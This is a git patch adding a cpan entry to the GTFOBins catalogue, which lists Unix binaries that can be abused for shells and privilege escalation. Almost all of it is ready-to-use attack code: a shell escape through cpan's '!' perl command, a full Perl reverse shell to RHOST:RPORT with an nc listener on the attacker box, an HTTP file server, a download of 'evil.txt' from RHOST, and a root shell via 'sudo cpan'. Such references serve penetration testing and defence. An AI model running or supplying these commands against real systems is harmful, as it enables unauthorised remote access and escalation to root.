From b3a6e93b781ed8807af5d868ca0e54b0261cbac8 Mon Sep 17 00:00:00 2001
From: Shaksham Jaiswal <shaks19jais@gmail.com>
Date: Tue, 6 Nov 2018 10:51:17 +0530
Subject: [PATCH] Add cpan

---
 _gtfobins/cpan.md | 33 +++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 _gtfobins/cpan.md

diff --git a/_gtfobins/cpan.md b/_gtfobins/cpan.md
new file mode 100644
index 0000000..0b5b9cc
--- /dev/null
+++ b/_gtfobins/cpan.md
@@ -0,0 +1,33 @@
+---
+functions:
+  shell:
+    - description: cpan lets you execute perl commands with `! command`  
+      code: |
+        $ cpan
+        cpan[1]> ! exec '/bin/bash'
+
+  reverse-shell:
+    - description: Run ``nc -lvp RPORT`` on the attacker box to receive the shell.
+      code: |
+        $ cpan
+        cpan[1]> ! use Socket; my $i="RHOST"; my $p=RPORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
+
+  file-upload:
+    - description: Serve files in the local folder running an HTTP server on port 8080. Install dependency via `cpan HTTP::Server::Simple`.
+      code: |
+        $ cpan
+        cpan[1]> ! cpan[1]> ! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
+
+  file-download:
+    - description: Fetch a remote file via HTTP GET request and store it in PWD. 
+      code: |
+        $ cpan
+        cpan[1]> ! use File::Fetch; my $file = (File::Fetch->new(uri => 'http://RHOST/evil.txt'))->fetch(); 
+
+  sudo:
+    - code: |
+        $ sudo cpan
+        cpan[1]> ! exec '/bin/bash'
+
+---
+